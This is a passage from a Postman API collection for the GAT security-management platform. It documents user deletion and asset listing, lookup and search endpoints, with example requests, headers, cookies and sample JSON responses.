\"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"demo.gat.digital","path":"/","secure":true,"value":"node0zki3n02p2q09xzpq2c8yr4ak756.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"demo.gat.digital","path":"/","secure":false,"value":"06a14939-1272-43e1-a6d9-1a96f32f0d33","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\"deleted\":2,\"deleted_ids\":[\"5bd780525ced7f65c39ceacd\",\"5bb61ea85ced7f6a7f0a0ae0\"],\"not_deleted\":0}"},{"id":"ff1a5339-dc5b-4021-b2ae-af5c84f59508","name":"Try to delete a User that doesn't exist","originalRequest":{"method":"DELETE","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer 1b47827e-d452-40b2-9d1a-abae333315b8","description":"Your API Key."}],"body":{"mode":"raw","raw":"{\n\t\"id\": [\"5bd780525ced7f65c39c4acd\"]\n}"},"url":"https://subdomain.gat.digital/api/v1/users"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Fri, 14 Jun 2019 10:48:04 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node0zki3n02p2q09xzpq2c8yr4ak756.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node01n3rgvr6bcd5pcnyfpstbwt38757.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=faa3e026-cb27-4731-81a3-228af1003de9;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"demo.gat.digital","path":"/","secure":true,"value":"node01n3rgvr6bcd5pcnyfpstbwt38757.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"demo.gat.digital","path":"/","secure":false,"value":"faa3e026-cb27-4731-81a3-228af1003de9","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\"deleted\":0,\"not_deleted\":1,\"not_deleted_details\":[{\"short_msg\":\"Unable to delete User.\",\"long_msg\":\"Invalid id\",\"user_id\":\"5bd780525ced7f65c39c4acd\",\"project_ids\":[],\"team_ids\":[]}]}"},{"id":"94c18902-72a1-4cd1-b403-eb0b615e12b2","name":"Send wrong data type","originalRequest":{"method":"DELETE","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer 1b47827e-d452-40b2-9d1a-abae333315b8","description":"Your API Key."}],"body":{"mode":"raw","raw":"{\n\t\"id\": \"5bd780525ced7f65c39c4acd\"\n}"},"url":"https://subdomain.gat.digital/api/v1/users"},"status":"Bad Request","code":400,"_postman_previewlanguage":"plain","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Date","value":"Fri, 14 Jun 2019 10:50:45 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node01n3rgvr6bcd5pcnyfpstbwt38757.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node01336hqute26mc1rhlcc4nfdfj0758.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=8b564354-e8ec-4f92-9681-3c2a292ba73a;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"demo.gat.digital","path":"/","secure":true,"value":"node01336hqute26mc1rhlcc4nfdfj0758.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"demo.gat.digital","path":"/","secure":false,"value":"8b564354-e8ec-4f92-9681-3c2a292ba73a","key":"XSRF-TOKEN"}],"responseTime":null,"body":""}],"_postman_id":"5f1f7943-af7f-4570-b354-542309d06ba5"}],"id":"c5743ec8-d88a-4fa9-9125-15e9b71a29d8","description":"<p>O GAT não possui limite de Usuários cadastrados e ativos na plataforma. Para ser possível centralizar e unificar os programas de Segurança da Informação, é necessário que todas as pessoas envolvidas nos processos tenham acesso ao GAT. Com isso, é possível criar Times, adicionar Responsáveis e Watchers aos apontamentos, adicionar comentários mencionando outros usuários, dentre muitas outras coisas.</p>\n<p>Dessa forma, permitimos um total controle sobre sua base de Usuários via API.</p>\n","event":[{"listen":"prerequest","script":{"type":"text/javascript","exec":[""],"id":"f739d2f3-80e2-47f1-9aa2-06b2d861993f"}},{"listen":"test","script":{"type":"text/javascript","exec":[""],"id":"5813b5fd-c7ed-49de-a6e3-f9b833375b39"}}],"_postman_id":"c5743ec8-d88a-4fa9-9125-15e9b71a29d8"},{"name":"Ativos","item":[{"name":"Assets","id":"bd6df3ce-0798-4106-a954-b7b2bf132a50","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer 1b47827e-d452-40b2-9d1a-abae333315b8"}],"url":"https://<instance>/api/v1/assets?size=30&page=0","description":"<p>This endpoint allows you to retrieve the active Assets on the database. It uses pagination, with parameters <strong>size</strong> and <strong>page</strong>. If none is specified, <strong>size</strong> will be 30 and <strong>page</strong> will be 0 by default. You can retrieve at most 200 records at once. If there are more than 200 Assets on the Database, you will need to get the remainder ones specifying the next <strong>pages</strong>.</p>\n","auth":{"type":"bearer","bearer":{"basicConfig":[{"key":"token","value":"<token>"}]},"isInherited":true,"source":{"_postman_id":"3c386811-178c-4031-9fac-af19d8b71091","id":"3c386811-178c-4031-9fac-af19d8b71091","name":"Ativos","type":"folder"}},"urlObject":{"protocol":"https","path":["api","v1","assets"],"host":["<instance>"],"query":[{"description":{"content":"<p>[optional] How many results you want. Default is 30. Max is 200</p>\n","type":"text/plain"},"key":"size","value":"30"},{"description":{"content":"<p>[optional] Which page you want to retrieve</p>\n","type":"text/plain"},"key":"page","value":"0"}],"variable":[]}},"response":[{"id":"62519a61-b860-4bfe-bd91-147515702507","name":"Retrieve the first 10 Assets","originalRequest":{"method":"GET","header":[{"key":"Content-Type","type":"text","name":"Content-Type","value":"application/x-www-form-urlencoded"},{"key":"Accept","value":"application/json","warning":""},{"key":"Authorization","value":"Bearer 1b47827e-d452-40b2-9d1a-abae333315b8","description":"Your API Key.","warning":"This is a duplicate header and will be overridden by the Authorization header generated by Postman."}],"url":{"raw":"https://subdomain.gat.digital/api/v1/assets?size=10&page=0","protocol":"https","host":["subdomain","gat","digital"],"path":["api","v1","assets"],"query":[{"key":"size","value":"10","description":"[optional] How many results you want. Default is 30. Max is 200"},{"key":"page","value":"0","description":"[optional] Which page you want to retrieve"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Fri, 14 Jun 2019 16:05:27 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node01mccbd4fdst6wufx0io4y0s2404.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=55aa86c8-5ba6-44d5-9f30-70e33ca9df0c;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node01mccbd4fdst6wufx0io4y0s2404.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"55aa86c8-5ba6-44d5-9f30-70e33ca9df0c","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\n    \"content\": [\n        {\n            \"hostname\": \"ec2-192-168-79-154.sa-east-1.compute.amazonaws.com\",\n            \"type\": \"HOST\",\n            \"severity\": 0,\n            \"asset_id\": \"5d03b90cc569d5025016e4d5\",\n            \"host_ip\": \"192.168.79.154\",\n            \"host_os\": \"Linux Kernel 3.13 on Ubuntu 14.04 (trusty)\"\n        },\n        {\n            \"hostname\": \"ec2-192-168-217-192.sa-east-1.compute.amazonaws.com\",\n            \"type\": \"HOST\",\n            \"severity\": 0,\n            \"asset_id\": \"5d03b90cc569d5025016e4d3\",\n            \"host_ip\": \"192.168.217.192\",\n            \"host_os\": \"Linux Kernel 3.13 on Ubuntu 14.04 (trusty)\"\n        },\n        {\n            \"hostname\": \"ec2-192-168-207-94.sa-east-1.compute.amazonaws.com\",\n            \"type\": \"HOST\",\n            \"severity\": 0,\n            \"asset_id\": \"5d03b90cc569d5025016e4cf\",\n            \"host_ip\": \"192.168.207.94\",\n            \"host_os\": \"Linux Kernel 4.4 on Ubuntu 16.04 (xenial)\"\n        },\n        {\n            \"score\": 0,\n            \"type\": \"APPLICATION\",\n            \"severity\": 2,\n            \"port\": 80,\n            \"asset_id\": \"5cd309a0c569d571d3afcd7f\",\n            \"app_url\": \"http://teste.com.br\",\n            \"app_credentials\": \"admin/admin\",\n            \"app_description\": \"Web app description\"\n        },\n        {\n            \"type\": \"PERSON\",\n            \"severity\": 0,\n            \"asset_id\": \"5d02c314c569d50143358ec1\",\n            \"person_email\": \"new.person@email.com\",\n            \"person_name\": \"New Person\"\n        },\n        {\n            \"type\": \"PERSON\",\n            \"severity\": 4,\n            \"asset_id\": \"5cfa98f6c569d53dcd073a1a\",\n            \"person_email\": \"name1.surname1@example.com\",\n            \"person_name\": \"Name1 Surname1\"\n        },\n        {\n            \"type\": \"PERSON\",\n            \"severity\": 2,\n            \"asset_id\": \"5cfa98e6c569d53dcd073a05\",\n            \"person_email\": \"name2.surname2@example.com\",\n            \"person_name\": \"Name2 Surname2\"\n        },\n        {\n            \"score\": 0,\n            \"type\": \"PROCESS\",\n            \"severity\": 0,\n            \"asset_id\": \"5cc36718c569d57711bf2ec4\",\n            \"process_name\": \"BACEN 4.658\",\n            \"process_description\": \"BACEN 4.658\"\n        },\n        {\n            \"type\": \"CLOUD\",\n            \"severity\": 0,\n            \"asset_id\": \"5ca4fc4ec569d523f821c7ad\",\n            \"cloud_instance_id\": \"i-8ac5d654fdcb3\",\n            \"cloud_name\": \"i-8ac5d654fdcb3\"\n        },\n        {\n            \"score\": 0,\n            \"type\": \"CLOUD\",\n            \"severity\": 2,\n            \"asset_id\": \"5ca4fc40c569d523f821c7a1\",\n            \"cloud_provider\": \"AWS\",\n            \"cloud_name\": \"i-4d2c3fb1a5d6efd3\",\n            \"cloud_instance_id\": \"i-4d2c3fb1a5d6efd3\"\n        }\n    ],\n    \"pageable\": {\n        \"sort\": {\n            \"sorted\": true,\n            \"unsorted\": false\n        },\n        \"pageSize\": 10,\n        \"pageNumber\": 0,\n        \"offset\": 0,\n        \"paged\": true,\n        \"unpaged\": false\n    },\n    \"totalPages\": 154,\n    \"totalElements\": 1532,\n    \"last\": false,\n    \"first\": true,\n    \"sort\": {\n        \"sorted\": true,\n        \"unsorted\": false\n    },\n    \"numberOfElements\": 10,\n    \"size\": 10,\n    \"number\": 0\n}"}],"_postman_id":"bd6df3ce-0798-4106-a954-b7b2bf132a50"},{"name":"Asset by ID","id":"66818c45-b7ec-4ca9-ab0d-cc3ef3157477","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"auth":{"type":"noauth","isInherited":false},"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"<p>Your API Key.</p>\n"}],"url":"https://<instance>/api/v1/assets/<asset_id>","description":"<p>This endpoint allows you to retrieve a single Asset, specifying its ID. If there is no active Asset with the specified ID, the server will respond with a 204: No Content.</p>\n","urlObject":{"protocol":"https","path":["api","v1","assets","<asset_id>"],"host":["<instance>"],"query":[],"variable":[]}},"response":[{"id":"1c9e7ad2-9d0b-4732-a475-6bb31b45352c","name":"Try to get wrong Asset","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"Your API Key."}],"url":"https://subdomain.gat.digital/api/v1/assets/5d03b91cc569d50250100000"},"status":"No Content","code":204,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Fri, 14 Jun 2019 17:25:09 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node0fdg1rsirf2r82in7f7btojf3752.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node012u92389kujd91huxbvyrc9q6l753.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=3caab602-be42-40d1-8ec5-d7184c3ef949;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node012u92389kujd91huxbvyrc9q6l753.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"3caab602-be42-40d1-8ec5-d7184c3ef949","key":"XSRF-TOKEN"}],"responseTime":null,"body":""},{"id":"ec6cb8a2-030b-4014-a354-4d28e94fa74e","name":"Get an Asset","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"Your API Key."}],"url":"https://subdomain.gat.digital/api/v1/assets/5d03b90cc569d5025016e4d5"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Fri, 14 Jun 2019 17:23:23 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node012c2vmgwv3880tq470qkzd55n747.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=500b05b3-15c1-4d2a-a6b7-9ca166820faf;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node012c2vmgwv3880tq470qkzd55n747.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"500b05b3-15c1-4d2a-a6b7-9ca166820faf","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\n    \"hostname\": \"ec2-192-168-79-154.sa-east-1.compute.amazonaws.com\",\n    \"type\": \"HOST\",\n    \"severity\": 0,\n    \"asset_id\": \"5d03b90cc569d5025016e4d5\",\n    \"host_ip\": \"192.168.79.154\",\n    \"host_os\": \"Linux Kernel 3.13 on Ubuntu 14.04 (trusty)\"\n}"}],"_postman_id":"66818c45-b7ec-4ca9-ab0d-cc3ef3157477"},{"name":"Search Asset with given filter","id":"e4cd4a26-2bfb-4245-bd4e-733f2767a9be","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"body":{"mode":"formdata","formdata":[{"key":"type","value":"List<String>","description":"<p>\"HOST\", \"APPLICATION\", \"PERSON\", \"PROCESS\", \"CLOUD\".</p>\n","type":"text"},{"key":"severity","value":"List<Int>","description":"<p>Integer from 0 to 4.</p>\n","type":"text"},{"key":"asset_id","value":"List<String>","description":"<p>List of Asset IDs.</p>\n","type":"text"},{"key":"tag","value":"List<String>","description":"<p>List of Tags.</p>\n","type":"text"},{"key":"asset_group","value":"List<String>","description":"<p>List with Assets Group IDs.</p>\n","type":"text"},{"key":"host_ip","value":"List<String>","description":"<p>List of HOST IP Addresses.</p>\n","type":"text"},{"key":"hostname","value":"List<String>","description":"<p>List of HOST Hostnames.</p>\n","type":"text"},{"key":"host_os","value":"List<String>","description":"<p>List of HOST Operating Systems.</p>\n","type":"text"},{"key":"host_netbios","value":"List<String>","description":"<p>List of HOST Netbios.</p>\n","type":"text"},{"key":"app_url","value":"List<String>","description":"<p>List of APP URLs.</p>\n","type":"text"},{"key":"app_credentials","value":"List<String>","description":"<p>List of APP Credentials.</p>\n","type":"text"},{"key":"app_description","value":"List<String>","description":"<p>List of APP Descriptions.</p>\n","type":"text"},{"key":"app_port","value":"List<Int>","description":"<p>List of APP Port Numbers.</p>\n","type":"text"},{"key":"person_email","value":"List<String>","description":"<p>List of PERSON Email Addresses.</p>\n","type":"text"},{"key":"person_name","value":"List<String>","description":"<p>List of PERSON Names. </p>\n","type":"text"},{"key":"person_surname","value":"List<String>","description":"<p>List of PERSON Surnames.</p>\n","type":"text"},{"key":"person_city","value":"List<String>","description":"<p>List of PERSON Cities.</p>\n","type":"text"},{"key":"person_country","value":"List<String>","description":"<p>List of PERSON Countries.</p>\n","type":"text"},{"key":"person_phone","value":"List<String>","description":"<p>List of PERSON Phone Numbers.</p>\n","type":"text"},{"key":"person_doc","value":"List<String>","description":"<p>List of PERSON Document Numbers.</p>\n","type":"text"},{"key":"process_name","value":"List<String>","description":"<p>List of PROCESS Names.</p>\n","type":"text"},{"key":"cloud_provider","value":"List<String>","description":"<p>List of Cloud Providers. Can be: \"AWS\", \"Google\" or \"Azure\".</p>\n","type":"text"},{"key":"cloud_name","value":"List<String>","description":"<p>List of CLOUD Names.</p>\n","type":"text"},{"key":"cloud_instance_type","value":"List<String>","description":"<p>List of Instance Types. Example: \"EC2\".</p>\n","type":"text"},{"key":"cloud_region","value":"List<String>","description":"<p>List of Regions. Example: \"us-west-2\".</p>\n","type":"text"},{"key":"cloud_security_groups","value":"List<String>","description":"<p>List of Security Groups. Example: \"sg-08ea804c883de4326\".</p>\n","type":"text"},{"key":"cloud_instance_id","value":"List<String>","description":"<p>List of CLOUD Instance IDs.</p>\n","type":"text"},{"key":"cloud_image_id","value":"List<String>","description":"<p>List of Image IDs (AMI). Example: \"ami-082b5a644766e0e6f\".</p>\n","type":"text"},{"key":"cloud_internal_ip_addresses","value":"List<String>","description":"<p>List of Internal IP Addresses.</p>\n","type":"text"},{"key":"cloud_public_ip_address","value":"List<String>","description":"<p>List of External IP Addresses.</p>\n","type":"text"},{"key":"creation_date","value":"Object","description":"<p>Object conatining \"operator\" and \"values\" as shown below.</p>\n","type":"text"},{"key":"creation_date.operator","value":"String","description":"<p>\"eq\", \"gt\", \"lt\", \"gte\", \"lte\", \"neq\" (not equal) or \"btw\" (between).</p>\n","type":"text"},{"key":"creation_date.values","value":"List<String>","description":"<p>A list containing 1 or 2 dates, depending on the operator. The Date format is: \"YYYY-MM-DDThh:mm:ss\".</p>\n","type":"text"}]},"url":"https://<instance>/api/v1/assets?size=30&page=0","description":"<p>This endpoint allows you to search for Assets based on a given filter. The fields are combined with an <strong>OR</strong> operator. Therefore, using eg. \"type: [HOST, APPLICATION]\" and \"process_name: [Process1]\" will retrieve all Assets of types HOST and APPLICATION, as well as the Process with name \"Process1\".</p>\n","auth":{"type":"bearer","bearer":{"basicConfig":[{"key":"token","value":"<token>"}]},"isInherited":true,"source":{"_postman_id":"3c386811-178c-4031-9fac-af19d8b71091","id":"3c386811-178c-4031-9fac-af19d8b71091","name":"Ativos","type":"folder"}},"urlObject":{"protocol":"https","path":["api","v1","assets"],"host":["<instance>"],"query":[{"description":{"content":"<p>[optional] How many results you want. Default is 30. Max is 200</p>\n","type":"text/plain"},"key":"size","value":"30"},{"description":{"content":"<p>[optional] Which page you want to retrieve</p>\n","type":"text/plain"},"key":"page","value":"0"}],"variable":[]}},"response":[{"id":"e8f875ed-a016-4c5a-85b4-4cddaf00ae80","name":"Send wrong type value to a parameter","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"body":{"mode":"raw","raw":"{\n\t\"app_url\": \"http://teste.com.br\"\n}"},"url":{"raw":"https://subdomain.gat.digital/api/v1/assets?size=30&page=0","protocol":"https","host":["subdomain","gat","digital"],"path":["api","v1","assets"],"query":[{"key":"size","value":"30","description":"[optional] How many results you want. Default is 30. Max is 200"},{"key":"page","value":"0","description":"[optional] Which page you want to retrieve"}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"plain","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Date","value":"Fri, 14 Jun 2019 18:37:56 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node013h8at5q92lmz37n61vpq2e5l1125.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP 